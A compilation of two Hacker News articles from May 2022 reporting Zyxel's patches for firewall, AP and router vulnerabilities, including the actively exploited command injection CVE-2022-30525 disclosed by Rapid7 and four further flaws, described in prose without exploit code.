* **Source:** [thehackernews.com/2022/05/zyxel-releases-patch-for-critical.html](<https://thehackernews.com/2022/05/zyxel-releases-patch-for-critical.html>)
* **Published:** 2022-05-13
* **CVEs referenced:** CVE-2022-0556, CVE-2022-26413, CVE-2022-26414, CVE-2022-30525

Zyxel has moved to address a critical security vulnerability affecting Zyxel firewall devices that enables unauthenticated and remote attackers to gain arbitrary code execution.

"A command injection vulnerability in the CGI program of some firewall versions could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device," the company [said](<https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml>) in an advisory published Thursday.

Cybersecurity firm Rapid7, which [discovered](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>) and reported the flaw on April 13, 2022, said that the weakness could permit a remote unauthenticated adversary to execute code as the "nobody" user on impacted appliances.

Tracked as [CVE-2022-30525](<https://nvd.nist.gov/vuln/detail/CVE-2022-30525>) (CVSS score: 9.8), the flaw impacts the following products, with patches released in version ZLD V5.30:

* USG FLEX 100(W), 200, 500, 700
* USG FLEX 50(W) / USG20(W)-VPN
* ATP series, and
* VPN series

Rapid7 noted that there are at least 16,213 vulnerable Zyxel devices exposed to the internet, making it a lucrative attack vector for threat actors to stage potential exploitation attempts.

The cybersecurity firm also pointed out that Zyxel silently issued fixes to address the issue on April 28, 2022 without publishing an associated Common Vulnerabilities and Exposures ([CVE](<https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures>)) identifier or a security advisory. Zyxel, in its alert, blamed this on a "miscommunication during the disclosure coordination process."

"Silent vulnerability patching tends to only help active attackers, and leaves defenders in the dark about the true risk of newly discovered issues," Rapid7 researcher Jake Baines said.

The advisory comes as Zyxel addressed three different issues, including a command injection ([CVE-2022-26413](<https://www.zyxel.com/support/OS-command-injection-and-buffer-overflow-vulnerabilities-of-CPE-and-ONTs.shtml>)), a buffer overflow ([CVE-2022-26414](<https://www.zyxel.com/support/OS-command-injection-and-buffer-overflow-vulnerabilities-of-CPE-and-ONTs.shtml>)), and a local privilege escalation ([CVE-2022-0556](<https://www.zyxel.com/support/Zyxel-security-advisory-for-local-privilege-escalation-vulnerability-of-AP-Configurator.shtml>)) flaw, in its VMG3312-T20A wireless router and AP Configurator that could lead to arbitrary code execution.

### Zyxel Issues Patches for 4 New Flaws Affecting AP, API Controller, and Firewall Devices
* **Source:** [thehackernews.com/2022/05/zyxel-issues-patches-for-4-new-flaws.html](<https://thehackernews.com/2022/05/zyxel-issues-patches-for-4-new-flaws.html>)
* **Published:** 2022-05-27
* **CVEs referenced:** CVE-2022-0734, CVE-2022-0910, CVE-2022-26531, CVE-2022-26532, CVE-2022-30525

Zyxel has released [patches](<https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-AP-controllers-and-APs.shtml>) to address four security flaws affecting its firewall, AP Controller, and AP products that could be exploited to execute arbitrary operating system commands and steal select information.

The list of security vulnerabilities is as follows:

* **CVE-2022-0734** - A cross-site scripting (XSS) vulnerability in some firewall versions that could be exploited to access information stored in the user's browser, such as cookies or session tokens, via a malicious script.
* **CVE-2022-26531** - Several input validation flaws in command line interface (CLI) commands for some versions of firewall, AP controller, and AP devices that could be exploited to cause a system crash.
* **CVE-2022-26532** - A command injection vulnerability in the "[packet-trace](<https://kb.zyxel.com/KB/searchArticle!gwsViewDetail.action?articleOid=013652&lang=EN>)" CLI command for some versions of firewall, AP controller, and AP devices that could lead to execution of arbitrary OS commands.
* **CVE-2022-0910** - An authentication bypass vulnerability affecting select firewall versions that could permit an attacker to downgrade from two-factor authentication to one-factor authentication via an IPsec VPN client.

While Zyxel has published software patches for firewalls and AP devices, hotfixes for AP controllers affected by CVE-2022-26531 and CVE-2022-26532 can be obtained only by contacting the respective local Zyxel support teams.

The development comes as a critical command injection flaw in select versions of Zyxel firewalls ([CVE-2022-30525](<https://thehackernews.com/2022/05/watch-out-hackers-begin-exploiting.html>), CVSS score: 9.8) has come under active exploitation, prompting the U.S. Cybersecurity and Infrastructure Security Agency to add the bug to its Known Exploited Vulnerabilities Catalog.